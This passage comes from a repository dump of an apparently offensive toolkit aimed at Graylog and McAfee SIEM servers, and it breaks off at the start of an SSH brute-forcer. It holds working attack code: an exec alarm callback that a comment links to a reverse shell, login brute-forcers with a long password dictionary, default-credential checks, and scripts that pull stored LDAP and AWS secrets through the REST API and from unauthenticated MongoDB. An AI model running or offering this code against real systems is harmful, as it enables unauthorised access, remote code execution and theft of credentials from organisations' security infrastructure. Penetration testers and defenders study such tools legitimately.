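            globals.messages(10)
            return
        response = s.get(typesurl, verify=False, timeout=30)

        # text of graylog2 plugin exec
        if response.status_code == 200 and "ir.elenoon.ExeCommandAlarmCallBack" in response.text:
            globals.graylog_messages(2)
            postresponse = s.post(alarmsurl, json=params, verify=False,
                                  timeout=30)

            if postresponse.status_code == 201:  # created status code
                globals.graylog_messages(3)
                data = postresponse.json()
                alertid = str(data['alarmcallback_id'])

                if alertid != "000000000000000000000000":
                    print("[!] 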
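Alarm Callback ID: " + alertid)
                    # Use the port the caller passed in; the API is not
                    # necessarily listening on 9000.
                    testurl = \
                        globals.http + ip + ":" + str(port) + \
                        "/api/alerts/callbacks/" + alertid + "/test"
                    # Testing the callback makes Graylog execute bashcommand,
                    # so the reverse-shell listener must be up by now.
                    testresponse = s.post(testurl, verify=False, timeout=30)

                    if testresponse.status_code == 200:
                        globals.graylog_messages(4)
                    else:
                        globals.graylog_messages(5)
                else:
                    globals.graylog_messages(6)

            else:
                globals.graylog_messages(7)

        else:
            globals.graylog_messages(8)

    except Exception as e:
        logging.error(e, exc_info=True)

# %%%%%%%%%% The End %%%%%%%%%%#
--------------------------------------------------------------------------------
/graylog/bruteforcegraylog.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

# Graylog Login Bruteforce

# %%%%%%%%%%% Libraries %%%%%%%%%%%#

import os
import logging
import globals
import requests

# %%%%%%%%%% Functions %%%%%%%%%#


def graylog_brute(ip, port):
    """Dictionary attack against the Graylog ``admin`` user.

    Posts every line of graylog/dict.txt to /api/system/sessions on
    ``ip:port`` and stops at the first password that yields HTTP 200,
    reporting it through globals.messages(). Prints "Dictionary Attack Not
    Successful" when the list is exhausted. A per-request error (connection
    refused, timeout) is logged and the next password is tried.
    """
    url = \
        globals.http + ip + ":" + str(port) + "/api/system/sessions"
    __location__ = os.path.realpath(os.path.join(
        os.getcwd(), os.path.dirname(__file__)))
    bruteforcesuccesfull = 0
    # Same header the other Graylog modules send on API requests; it does not
    # change per attempt, so it is built once outside the loop.
    headers = {'X-Requested-By': 'XMLHttpRequest'}

    # The with-block closes the word list on every exit path, including the
    # break after a hit and an exception that escapes the loop.
    with open(os.path.join(__location__, 'dict.txt')) as files:
        for line in files:
            password = line.strip('\n\r')
            params = {
                'username': 'admin',
                'password': password,
                'host': ip}

            try:
                # Credentials go over plain HTTP (globals.http); verify=False
                # is kept for parity with the other modules but has no effect
                # on an http:// URL. The timeout keeps one hung request from
                # stalling the whole run.
                response = requests.post(
                    url, json=params, headers=headers, verify=False,
                    timeout=30)

                if response.status_code == 200:
                    globals.messages(7)
                    mess = ['admin', password]
                    globals.messages(9, mess)
                    bruteforcesuccesfull = 1
                    break

            except Exception as e:
                logging.error(e, exc_info=True)

    if not bruteforcesuccesfull:
        globals.messages(8)

# %%%%%%%%%% The End %%%%%%%%%%#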
-------------------------------------------------------------------------------- /graylog/dict.txt: -------------------------------------------------------------------------------- 1 | admin 2 | graylog 3 | Graylog 4 | GRAYLOG 5 | Gr4yl0g 6 | gr4yl0g 7 | ubuntu 8 | changeme 9 | graylog123 10 | graylog1 11 | graylog2 12 | graylog3 13 | graylog4 14 | graylog5 15 | graylog6 16 | graylog7 17 | graylog8 18 | graylog9 19 | graylog0 20 | graylog! 21 | graylog@ 22 | graylog# 23 | graylog$ 24 | graylog% 25 | graylog^ 26 | graylog& 27 | graylog* 28 | graylog? 29 | Graylog1 30 | Graylog2 31 | Graylog3 32 | Graylog4 33 | Graylog5 34 | Graylog6 35 | Graylog7 36 | Graylog8 37 | Graylog9 38 | Graylog0 39 | Graylog! 40 | Graylog@ 41 | Graylog# 42 | Graylog$ 43 | Graylog% 44 | Graylog^ 45 | Graylog& 46 | Graylog* 47 | Graylog? 48 | 6raylog1 49 | 6raylog2 50 | 6raylog3 51 | 6raylog4 52 | 6raylog5 53 | 6raylog6 54 | 6raylog7 55 | 6raylog8 56 | 6raylog9 57 | 6raylog0 58 | 6raylog! 59 | 6raylog@ 60 | 6raylog# 61 | 6raylog$ 62 | 6raylog% 63 | 6raylog^ 64 | 6raylog& 65 | 6raylog* 66 | 6raylog? 67 | 9raylog1 68 | 9raylog2 69 | 9raylog3 70 | 9raylog4 71 | 9raylog5 72 | 9raylog6 73 | 9raylog7 74 | 9raylog8 75 | 9raylog9 76 | 9raylog0 77 | 9raylog! 78 | 9raylog@ 79 | 9raylog# 80 | 9raylog$ 81 | 9raylog% 82 | 9raylog^ 83 | 9raylog& 84 | 9raylog* 85 | 9raylog? 86 | gRAYLOG1 87 | gRAYLOG2 88 | gRAYLOG3 89 | gRAYLOG4 90 | gRAYLOG5 91 | gRAYLOG6 92 | gRAYLOG7 93 | gRAYLOG8 94 | gRAYLOG9 95 | gRAYLOG0 96 | gRAYLOG! 97 | gRAYLOG@ 98 | gRAYLOG# 99 | gRAYLOG$ 100 | gRAYLOG% 101 | gRAYLOG^ 102 | gRAYLOG& 103 | gRAYLOG* 104 | gRAYLOG? 105 | GRAYLOG1 106 | GRAYLOG2 107 | GRAYLOG3 108 | GRAYLOG4 109 | GRAYLOG5 110 | GRAYLOG6 111 | GRAYLOG7 112 | GRAYLOG8 113 | GRAYLOG9 114 | GRAYLOG0 115 | GRAYLOG! 116 | GRAYLOG@ 117 | GRAYLOG# 118 | GRAYLOG$ 119 | GRAYLOG% 120 | GRAYLOG^ 121 | GRAYLOG& 122 | GRAYLOG* 123 | GRAYLOG? 
124 | 6RAYLOG1 125 | 6RAYLOG2 126 | 6RAYLOG3 127 | 6RAYLOG4 128 | 6RAYLOG5 129 | 6RAYLOG6 130 | 6RAYLOG7 131 | 6RAYLOG8 132 | 6RAYLOG9 133 | 6RAYLOG0 134 | 6RAYLOG! 135 | 6RAYLOG@ 136 | 6RAYLOG# 137 | 6RAYLOG$ 138 | 6RAYLOG% 139 | 6RAYLOG^ 140 | 6RAYLOG& 141 | 6RAYLOG* 142 | 6RAYLOG? 143 | 9RAYLOG1 144 | 9RAYLOG2 145 | 9RAYLOG3 146 | 9RAYLOG4 147 | 9RAYLOG5 148 | 9RAYLOG6 149 | 9RAYLOG7 150 | 9RAYLOG8 151 | 9RAYLOG9 152 | 9RAYLOG0 153 | 9RAYLOG! 154 | 9RAYLOG@ 155 | 9RAYLOG# 156 | 9RAYLOG$ 157 | 9RAYLOG% 158 | 9RAYLOG^ 159 | 9RAYLOG& 160 | 9RAYLOG* 161 | 9RAYLOG? 162 | graylog11 163 | graylog12 164 | graylog13 165 | graylog14 166 | graylog15 167 | graylog16 168 | graylog17 169 | graylog18 170 | graylog19 171 | graylog10 172 | graylog1! 173 | graylog1@ 174 | graylog1# 175 | graylog1$ 176 | graylog1% 177 | graylog1^ 178 | graylog1& 179 | graylog1* 180 | graylog1? 181 | Graylog11 182 | Graylog12 183 | Graylog13 184 | Graylog14 185 | Graylog15 186 | Graylog16 187 | Graylog17 188 | Graylog18 189 | Graylog19 190 | Graylog10 191 | Graylog1! 192 | Graylog1@ 193 | Graylog1# 194 | Graylog1$ 195 | Graylog1% 196 | Graylog1^ 197 | Graylog1& 198 | Graylog1* 199 | Graylog1? 200 | 6raylog11 201 | 6raylog12 202 | 6raylog13 203 | 6raylog14 204 | 6raylog15 205 | 6raylog16 206 | 6raylog17 207 | 6raylog18 208 | 6raylog19 209 | 6raylog10 210 | 6raylog1! 211 | 6raylog1@ 212 | 6raylog1# 213 | 6raylog1$ 214 | 6raylog1% 215 | 6raylog1^ 216 | 6raylog1& 217 | 6raylog1* 218 | 6raylog1? 219 | 9raylog11 220 | 9raylog12 221 | 9raylog13 222 | 9raylog14 223 | 9raylog15 224 | 9raylog16 225 | 9raylog17 226 | 9raylog18 227 | 9raylog19 228 | 9raylog10 229 | 9raylog1! 230 | 9raylog1@ 231 | 9raylog1# 232 | 9raylog1$ 233 | 9raylog1% 234 | 9raylog1^ 235 | 9raylog1& 236 | 9raylog1* 237 | 9raylog1? 238 | graylog121 239 | graylog122 240 | graylog123 241 | graylog124 242 | graylog125 243 | graylog126 244 | graylog127 245 | graylog128 246 | graylog129 247 | graylog120 248 | graylog12! 
249 | graylog12@ 250 | graylog12# 251 | graylog12$ 252 | graylog12% 253 | graylog12^ 254 | graylog12& 255 | graylog12* 256 | graylog12? 257 | Graylog121 258 | Graylog122 259 | Graylog123 260 | Graylog124 261 | Graylog125 262 | Graylog126 263 | Graylog127 264 | Graylog128 265 | Graylog129 266 | Graylog120 267 | Graylog12! 268 | Graylog12@ 269 | Graylog12# 270 | Graylog12$ 271 | Graylog12% 272 | Graylog12^ 273 | Graylog12& 274 | Graylog12* 275 | Graylog12? 276 | 6raylog121 277 | 6raylog122 278 | 6raylog123 279 | 6raylog124 280 | 6raylog125 281 | 6raylog126 282 | 6raylog127 283 | 6raylog128 284 | 6raylog129 285 | 6raylog120 286 | 6raylog12! 287 | 6raylog12@ 288 | 6raylog12# 289 | 6raylog12$ 290 | 6raylog12% 291 | 6raylog12^ 292 | 6raylog12& 293 | 6raylog12* 294 | 6raylog12? 295 | 9raylog121 296 | 9raylog122 297 | 9raylog123 298 | 9raylog124 299 | 9raylog125 300 | 9raylog126 301 | 9raylog127 302 | 9raylog128 303 | 9raylog129 304 | 9raylog120 305 | 9raylog12! 306 | 9raylog12@ 307 | 9raylog12# 308 | 9raylog12$ 309 | 9raylog12% 310 | 9raylog12^ 311 | 9raylog12& 312 | 9raylog12* 313 | 9raylog12? 314 | graylog1231 315 | graylog1232 316 | graylog1233 317 | graylog1234 318 | graylog1235 319 | graylog1236 320 | graylog1237 321 | graylog1238 322 | graylog1239 323 | graylog1230 324 | graylog123! 325 | graylog123@ 326 | graylog123# 327 | graylog123$ 328 | graylog123% 329 | graylog123^ 330 | graylog123& 331 | graylog123* 332 | graylog123? 333 | Graylog1231 334 | Graylog1232 335 | Graylog1233 336 | Graylog1234 337 | Graylog1235 338 | Graylog1236 339 | Graylog1237 340 | Graylog1238 341 | Graylog1239 342 | Graylog1230 343 | Graylog123! 344 | Graylog123@ 345 | Graylog123# 346 | Graylog123$ 347 | Graylog123% 348 | Graylog123^ 349 | Graylog123& 350 | Graylog123* 351 | Graylog123? 352 | 6raylog1231 353 | 6raylog1232 354 | 6raylog1233 355 | 6raylog1234 356 | 6raylog1235 357 | 6raylog1236 358 | 6raylog1237 359 | 6raylog1238 360 | 6raylog1239 361 | 6raylog1230 362 | 6raylog123! 
363 | 6raylog123@ 364 | 6raylog123# 365 | 6raylog123$ 366 | 6raylog123% 367 | 6raylog123^ 368 | 6raylog123& 369 | 6raylog123* 370 | 6raylog123? 371 | 9raylog1231 372 | 9raylog1232 373 | 9raylog1233 374 | 9raylog1234 375 | 9raylog1235 376 | 9raylog1236 377 | 9raylog1237 378 | 9raylog1238 379 | 9raylog1239 380 | 9raylog1230 381 | 9raylog123! 382 | 9raylog123@ 383 | 9raylog123# 384 | 9raylog123$ 385 | 9raylog123% 386 | 9raylog123^ 387 | 9raylog123& 388 | 9raylog123* 389 | 9raylog123? 390 | biteme 391 | 1992 392 | london 393 | soccer 394 | william 395 | querty 396 | liverpool 397 | pussy 398 | admin123 399 | whatever 400 | dallas 401 | hockey 402 | test 403 | zaq1zaq1 404 | 1q2w3e 405 | aaaaaa 406 | killer 407 | bandit 408 | ashley 409 | cookie 410 | merlin 411 | trustno1 412 | 1991 413 | ranger 414 | chelsea 415 | banana 416 | jennifer 417 | 1990 418 | amanda 419 | 1989 420 | hunter 421 | nicole 422 | hello 423 | maverick 424 | blahblah 425 | mercedes 426 | corvette 427 | computer 428 | cheese 429 | ferrari 430 | starwars 431 | 1qaz2wsx 432 | andrea 433 | lakers 434 | andrew 435 | 12341234 436 | matthew 437 | robert 438 | 1234 439 | sophie 440 | pepper 441 | joshua 442 | tigger 443 | 55555 444 | jordan 445 | solo 446 | abcdef 447 | letmein 448 | ginger 449 | jessica 450 | 222222 451 | harley 452 | george 453 | summer 454 | thomas 455 | hannah 456 | daniel 457 | buster 458 | baseball 459 | passw0rd 460 | shadow 461 | freedom 462 | bailey 463 | 121212 464 | zxcvbnm 465 | qwerty123 466 | password1 467 | donald 468 | aa123456 469 | charlie 470 | !@#$%^&* 471 | 654321 472 | monkey 473 | 123123 474 | football 475 | abc123 476 | 666666 477 | welcome 478 | admin 479 | princess 480 | iloveyou 481 | qwerty 482 | sunshine 483 | 1234567 484 | 111111 485 | 12345 486 | 12345678 487 | 123456789 488 | password 489 | 123456 490 | admin1 491 | admin2 492 | admin3 493 | admin4 494 | admin5 495 | admin6 496 | admin7 497 | admin8 498 | admin9 499 | admin0 500 | admin! 
501 | admin@ 502 | admin# 503 | admin$ 504 | admin% 505 | admin^ 506 | admin& 507 | admin* 508 | admin? 509 | Admin1 510 | Admin2 511 | Admin3 512 | Admin4 513 | Admin5 514 | Admin6 515 | Admin7 516 | Admin8 517 | Admin9 518 | Admin0 519 | Admin! 520 | Admin@ 521 | Admin# 522 | Admin$ 523 | Admin% 524 | Admin^ 525 | Admin& 526 | Admin* 527 | Admin? 528 | @dmin1 529 | @dmin2 530 | @dmin3 531 | @dmin4 532 | @dmin5 533 | @dmin6 534 | @dmin7 535 | @dmin8 536 | @dmin9 537 | @dmin0 538 | @dmin! 539 | @dmin@ 540 | @dmin# 541 | @dmin$ 542 | @dmin% 543 | @dmin^ 544 | @dmin& 545 | @dmin* 546 | @dmin? 547 | 4dmin1 548 | 4dmin2 549 | 4dmin3 550 | 4dmin4 551 | 4dmin5 552 | 4dmin6 553 | 4dmin7 554 | 4dmin8 555 | 4dmin9 556 | 4dmin0 557 | 4dmin! 558 | 4dmin@ 559 | 4dmin# 560 | 4dmin$ 561 | 4dmin% 562 | 4dmin^ 563 | 4dmin& 564 | 4dmin* 565 | 4dmin? 566 | admin1231 567 | admin1232 568 | admin1233 569 | admin1234 570 | admin1235 571 | admin1236 572 | admin1237 573 | admin1238 574 | admin1239 575 | admin1230 576 | admin123! 577 | admin123@ 578 | admin123# 579 | admin123$ 580 | admin123% 581 | admin123^ 582 | admin123& 583 | admin123* 584 | admin123? 585 | Admin1231 586 | Admin1232 587 | Admin1233 588 | Admin1234 589 | Admin1235 590 | Admin1236 591 | Admin1237 592 | Admin1238 593 | Admin1239 594 | Admin1230 595 | Admin123! 596 | Admin123@ 597 | Admin123# 598 | Admin123$ 599 | Admin123% 600 | Admin123^ 601 | Admin123& 602 | Admin123* 603 | Admin123? 604 | @dmin1231 605 | @dmin1232 606 | @dmin1233 607 | @dmin1234 608 | @dmin1235 609 | @dmin1236 610 | @dmin1237 611 | @dmin1238 612 | @dmin1239 613 | @dmin1230 614 | @dmin123! 615 | @dmin123@ 616 | @dmin123# 617 | @dmin123$ 618 | @dmin123% 619 | @dmin123^ 620 | @dmin123& 621 | @dmin123* 622 | @dmin123? 623 | 4dmin1231 624 | 4dmin1232 625 | 4dmin1233 626 | 4dmin1234 627 | 4dmin1235 628 | 4dmin1236 629 | 4dmin1237 630 | 4dmin1238 631 | 4dmin1239 632 | 4dmin1230 633 | 4dmin123! 
634 | 4dmin123@ 635 | 4dmin123# 636 | 4dmin123$ 637 | 4dmin123% 638 | 4dmin123^ 639 | 4dmin123& 640 | 4dmin123* 641 | 4dmin123? 642 | gr4yl0g1 643 | gr4yl0g2 644 | gr4yl0g3 645 | gr4yl0g4 646 | gr4yl0g5 647 | gr4yl0g6 648 | gr4yl0g7 649 | gr4yl0g8 650 | gr4yl0g9 651 | gr4yl0g0 652 | gr4yl0g! 653 | gr4yl0g@ 654 | gr4yl0g# 655 | gr4yl0g$ 656 | gr4yl0g% 657 | gr4yl0g^ 658 | gr4yl0g& 659 | gr4yl0g* 660 | gr4yl0g? 661 | Gr4yl0g1 662 | Gr4yl0g2 663 | Gr4yl0g3 664 | Gr4yl0g4 665 | Gr4yl0g5 666 | Gr4yl0g6 667 | Gr4yl0g7 668 | Gr4yl0g8 669 | Gr4yl0g9 670 | Gr4yl0g0 671 | Gr4yl0g! 672 | Gr4yl0g@ 673 | Gr4yl0g# 674 | Gr4yl0g$ 675 | Gr4yl0g% 676 | Gr4yl0g^ 677 | Gr4yl0g& 678 | Gr4yl0g* 679 | Gr4yl0g? 680 | 6r4yl0g1 681 | 6r4yl0g2 682 | 6r4yl0g3 683 | 6r4yl0g4 684 | 6r4yl0g5 685 | 6r4yl0g6 686 | 6r4yl0g7 687 | 6r4yl0g8 688 | 6r4yl0g9 689 | 6r4yl0g0 690 | 6r4yl0g! 691 | 6r4yl0g@ 692 | 6r4yl0g# 693 | 6r4yl0g$ 694 | 6r4yl0g% 695 | 6r4yl0g^ 696 | 6r4yl0g& 697 | 6r4yl0g* 698 | 6r4yl0g? 699 | 9r4yl0g1 700 | 9r4yl0g2 701 | 9r4yl0g3 702 | 9r4yl0g4 703 | 9r4yl0g5 704 | 9r4yl0g6 705 | 9r4yl0g7 706 | 9r4yl0g8 707 | 9r4yl0g9 708 | 9r4yl0g0 709 | 9r4yl0g! 710 | 9r4yl0g@ 711 | 9r4yl0g# 712 | 9r4yl0g$ 713 | 9r4yl0g% 714 | 9r4yl0g^ 715 | 9r4yl0g& 716 | 9r4yl0g* 717 | 9r4yl0g? 718 | admin121 719 | admin122 720 | admin123 721 | admin124 722 | admin125 723 | admin126 724 | admin127 725 | admin128 726 | admin129 727 | admin120 728 | admin12! 729 | admin12@ 730 | admin12# 731 | admin12$ 732 | admin12% 733 | admin12^ 734 | admin12& 735 | admin12* 736 | admin12? 737 | Admin121 738 | Admin122 739 | Admin123 740 | Admin124 741 | Admin125 742 | Admin126 743 | Admin127 744 | Admin128 745 | Admin129 746 | Admin120 747 | Admin12! 748 | Admin12@ 749 | Admin12# 750 | Admin12$ 751 | Admin12% 752 | Admin12^ 753 | Admin12& 754 | Admin12* 755 | Admin12? 
756 | @dmin121 757 | @dmin122 758 | @dmin123 759 | @dmin124 760 | @dmin125 761 | @dmin126 762 | @dmin127 763 | @dmin128 764 | @dmin129 765 | @dmin120 766 | @dmin12! 767 | @dmin12@ 768 | @dmin12# 769 | @dmin12$ 770 | @dmin12% 771 | @dmin12^ 772 | @dmin12& 773 | @dmin12* 774 | @dmin12? 775 | 4dmin121 776 | 4dmin122 777 | 4dmin123 778 | 4dmin124 779 | 4dmin125 780 | 4dmin126 781 | 4dmin127 782 | 4dmin128 783 | 4dmin129 784 | 4dmin120 785 | 4dmin12! 786 | 4dmin12@ 787 | 4dmin12# 788 | 4dmin12$ 789 | 4dmin12% 790 | 4dmin12^ 791 | 4dmin12& 792 | 4dmin12* 793 | 4dmin12? -------------------------------------------------------------------------------- /graylog/obtaincredentialsrestapi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Graylog Obtain Stored Credentials via REST API 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | 8 | import getpass 9 | import logging 10 | import urllib3 11 | import globals 12 | import colorama 13 | import requests 14 | 15 | from colorama import Fore 16 | from colorama import Style 17 | from requests.auth import HTTPBasicAuth 18 | 19 | colorama.init() 20 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 21 | 22 | # %%%%%%%%%% Functions %%%%%%%%%# 23 | 24 | 25 | def obtain_ldap_credentials(ip, port): 26 | 27 | ldapurl = globals.http + ip + ":" + str( 28 | port) + "/api/system/ldap/settings?pretty=true" 29 | awspluginurl = globals.http + ip + ":" + str( 30 | port) + "/api/system/cluster_config/org.graylog.aws.config.AWSPluginConfiguration?pretty=true" 31 | headers = {'Accept': 'application/json'} 32 | graylogpass = getpass.getpass( 33 | Fore.CYAN + Style.BRIGHT + "[!] 
Enter Graylog Admin Password: " + 34 | Style.RESET_ALL) 35 | 36 | try: 37 | response = requests.get(ldapurl, auth=HTTPBasicAuth('admin', graylogpass)) 38 | 39 | if response.status_code == 200 and "DOCTYPE html" not in response.text: 40 | globals.graylog_messages(1) 41 | print(response.text.strip('{}').replace('\n', '\n[!]')) 42 | else: 43 | globals.graylog_messages(2) 44 | 45 | except Exception as e: 46 | logging.error(e, exc_info=True) 47 | 48 | try: 49 | response = requests.get( 50 | awspluginurl, auth=HTTPBasicAuth( 51 | 'admin', graylogpass), headers=headers) 52 | 53 | if response.status_code == 200 and "DOCTYPE html" not in response.text: 54 | globals.graylog_messages(3) 55 | print(response.text.strip('{}').replace('\n', '\n[!]')) 56 | else: 57 | globals.graylog_messages(4) 58 | 59 | except Exception as e: 60 | logging.error(e, exc_info=True) 61 | 62 | # %%%%%%%%%% The End %%%%%%%%%%# 63 | -------------------------------------------------------------------------------- /graylog/obtaininputsrestapi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Graylog Obtain Credentials from Inputs 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import getpass 8 | import globals 9 | import logging 10 | import urllib3 11 | import requests 12 | import colorama 13 | 14 | from colorama import Fore 15 | from colorama import Style 16 | from requests.auth import HTTPBasicAuth 17 | 18 | 19 | colorama.init() 20 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 21 | 22 | # %%%%%%%%%% Functions %%%%%%%%%# 23 | 24 | 25 | def obtain_inputs(ip, port): 26 | 27 | inputsurl = globals.http + ip + ":" + str( 28 | port) + "/api/system/inputs?pretty=true" 29 | graylogpass = getpass.getpass( 30 | Fore.CYAN + Style.BRIGHT + "[!] 
Enter Graylog Admin Password: " + 31 | Style.RESET_ALL) 32 | 33 | try: 34 | response = requests.get( 35 | inputsurl, auth=HTTPBasicAuth('admin', graylogpass)) 36 | 37 | if response.status_code == 200 and "DOCTYPE html" not in response.text: 38 | globals.graylog_messages(5) 39 | data = response.json() 40 | inputs = data['inputs'] 41 | 42 | for x in inputs: 43 | attributes = x['attributes'] 44 | 45 | if ('password' or 'secret') in str(attributes): 46 | print(globals.SEPARATOR) 47 | print("[!] " + str(x['title'])) 48 | print(globals.SEPARATOR) 49 | for y in attributes: 50 | if ('password' or 'secret') in str(y): 51 | print(Fore.RED + Style.BRIGHT + "[!] " + str( 52 | y) + ": " + str(attributes[y]) + Style.RESET_ALL) 53 | else: 54 | print("[!] " + str(y) + ": " + str(attributes[y])) 55 | else: 56 | globals.graylog_messages(6) 57 | 58 | except Exception as e: 59 | logging.error(e, exc_info=True) 60 | 61 | # %%%%%%%%%% The End %%%%%%%%%%# 62 | -------------------------------------------------------------------------------- /graylog/obtainmongodbcredentials.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Graylog Test Connection to MongoDB without 4 | # Authentication and Read Sensitive Information 5 | 6 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 7 | 8 | import nmap 9 | import logging 10 | import globals 11 | 12 | from pymongo import MongoClient 13 | from pymongo.errors import ConnectionFailure 14 | 15 | 16 | # %%%%%%%%%%% Constants %%%%%%%%%%%# 17 | 18 | MONGODB_PORT = 27017 19 | 20 | # %%%%%%%%%% Functions %%%%%%%%%# 21 | 22 | 23 | def test_mongo_credentials(ip): 24 | 25 | nm = nmap.PortScanner() 26 | 27 | try: 28 | nm.scan(hosts=ip, arguments='-sT -T4 -p 27017') 29 | 30 | if nm[ip]['tcp'][MONGODB_PORT]['state'] == 'open': 31 | 32 | try: 33 | client = MongoClient(ip, MONGODB_PORT) 34 | db = client.graylog 35 | globals.graylog_messages(7) 36 | 37 | print("[!] 
" + (str(list(db.ldap_settings.find({}, { 38 | 'system_username': 1, '_id': 0})))).strip(' [{}]')) 39 | print("[!] " + (str(list(db.ldap_settings.find({}, { 40 | 'system_password': 1, '_id': 0})))).strip(' [{}]')) 41 | print("[!] " + (str(list(db.ldap_settings.find({}, { 42 | 'system_password_salt': 1, '_id': 0})))).strip(' [{}]')) 43 | print("[!] " + (str(list(db.ldap_settings.find({}, { 44 | 'ldap_uri': 1, '_id': 0})))).strip(' [{}]')) 45 | 46 | globals.graylog_messages(8) 47 | 48 | awsaccesskey = list( 49 | db.cluster_config.find({ 50 | 'type': 'org.graylog.aws.config.AWSPluginConfiguration'}, 51 | {'payload.access_key': 1, '_id': 0})) 52 | accesskey = str(awsaccesskey).replace( 53 | 'payload', '').strip('[{}]').replace("'': {", '') 54 | awssecretkey = list( 55 | db.cluster_config.find({ 56 | 'type': 'org.graylog.aws.config.AWSPluginConfiguration'}, 57 | {'payload.secret_key': 1, '_id': 0})) 58 | secretkey = str(awssecretkey).replace( 59 | 'payload', '').strip('[{}]').replace("'': {", '') 60 | 61 | globals.graylog_messages(9) 62 | print("[!] " + accesskey) 63 | print("[!] 
" + secretkey) 64 | print(globals.SEPARATOR) 65 | 66 | except ConnectionFailure: 67 | globals.graylog_messages(10) 68 | 69 | else: 70 | globals.graylog_messages(11) 71 | 72 | except Exception as e: 73 | logging.error(e, exc_info=True) 74 | 75 | # %%%%%%%%%% The End %%%%%%%%%%# 76 | -------------------------------------------------------------------------------- /graylog/testcredentialsgraylog.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Graylog Test Default OVA/AMI Credentials Web: admin/admin SSH: ubuntu/ubuntu 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import globals 8 | import logging 9 | import paramiko 10 | import requests 11 | 12 | 13 | # %%%%%%%%%% Functions %%%%%%%%%# 14 | 15 | 16 | def default_web_credentials(ip, port): 17 | 18 | url = globals.http + ip + ":" + str(port) + "/api/system/sessions" 19 | # default web interface credentials 20 | params = { 21 | 'username': 'admin', 22 | 'password': 'admin', 23 | 'host': ip 24 | } 25 | headers = {'X-Requested-By': 'XMLHttpRequest'} 26 | 27 | try: 28 | response = requests.post(url, json=params, 29 | headers=headers, verify=False) 30 | 31 | if response.status_code == 200: 32 | globals.graylog_messages(12) 33 | mess = ['admin', 'admin'] 34 | globals.messages(9, mess) 35 | else: 36 | globals.graylog_messages(13) 37 | 38 | except Exception as e: 39 | logging.error(e, exc_info=True) 40 | 41 | 42 | def default_ssh_credentials(ip): 43 | 44 | ssh = paramiko.SSHClient() 45 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 46 | 47 | try: 48 | ssh.connect(ip, username='ubuntu', password='ubuntu') 49 | globals.graylog_messages(14) 50 | mess = ['ubuntu', 'ubuntu'] 51 | globals.messages(9, mess) 52 | except paramiko.AuthenticationException: 53 | globals.graylog_messages(15) 54 | 55 | # %%%%%%%%%% The End %%%%%%%%%%# 56 | -------------------------------------------------------------------------------- /mcafee/bruteforcemcafee.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # McAfee Login Bruteforce 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import os 8 | import json 9 | import time 10 | import base64 11 | import logging 12 | import globals 13 | import requests 14 | 15 | # %%%%%%%%%% Functions %%%%%%%%%# 16 | 17 | 18 | def mcafee_brute(ip, port): 19 | __location__ = os.path.realpath( 20 | os.path.join(os.getcwd(), os.path.dirname(__file__))) 21 | file = open(os.path.join(__location__, 'dict.txt')) 22 | bruteforcesuccesfull = 0 23 | https = "https://" 24 | 25 | agents = [ 26 | 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,' 27 | ' like Gecko) Chrome/79.0.3945.88 Safari/537.36', 28 | 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/47.0', 29 | 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/42.0', 30 | 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,' 31 | ' like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41' 32 | ] 33 | a = 0 34 | 35 | for line in file: 36 | 37 | password = line.strip('\n\r') 38 | url1 = https + ip + ":" + str(port) + "/ess" 39 | url2 = https + ip + ":" + str(port) + "/rs/esm/v2/login" 40 | headers = { 41 | 'Accept': 'application/json,text/plain,*/*', 42 | 'DNT': '1', 43 | 'Host': ip, 44 | 'Origin': 'https://' + ip, 45 | 'Referer': 'https://' + ip, 46 | 'User-Agent': agents[a], 47 | 'Content-Type': 'application/json;charset=utf-8', 48 | 'Connection': 'keep - alive', 49 | 'X-Xsrf-Token': 'null' 50 | } 51 | 52 | params = { 53 | 'username': 'TkdDUA==', 54 | 'password': str(base64.b64encode(password.encode('utf-8')), 'utf-8'), 55 | 'locale': 'en_US', 56 | 'os': "Linux x86_64" 57 | } 58 | json_params = json.dumps(params).encode('utf-8') 59 | 60 | try: 61 | response = requests.post( 62 | url1, data='Request=API%13CAC%5FLOGIN%13%14', 63 | headers=headers, verify=False) 64 | 65 | if response.status_code == 200: 66 | headers['Accept'] = 
'application/json' 67 | response2 = requests.post( 68 | url2, data=json_params, headers=headers, verify=False) 69 | if response2.status_code == 201: 70 | globals.messages(7) 71 | mess = ['NGCP', password] 72 | globals.messages(9, mess) 73 | bruteforcesuccesfull = 1 74 | break 75 | else: 76 | if a <= 2: 77 | a += 1 78 | else: 79 | time.sleep(360) 80 | a = 0 81 | 82 | except Exception as e: 83 | logging.error(e, exc_info=True) 84 | 85 | if not bruteforcesuccesfull: 86 | globals.messages(8) 87 | 88 | # %%%%%%%%%% The End %%%%%%%%%%# 89 | -------------------------------------------------------------------------------- /mcafee/bruteforcessh.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # McAfee SSH Bruteforce 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import os 8 | import nmap 9 | import logging 10 | import globals 11 | import paramiko 12 | 13 | # %%%%%%%%%% Functions %%%%%%%%%# 14 | 15 | 16 | def mcafee_ssh_brute(ip): 17 | __location__ = os.path.realpath( 18 | os.path.join(os.getcwd(), os.path.dirname(__file__))) 19 | file = open(os.path.join(__location__, 'dict.txt')) 20 | nm = 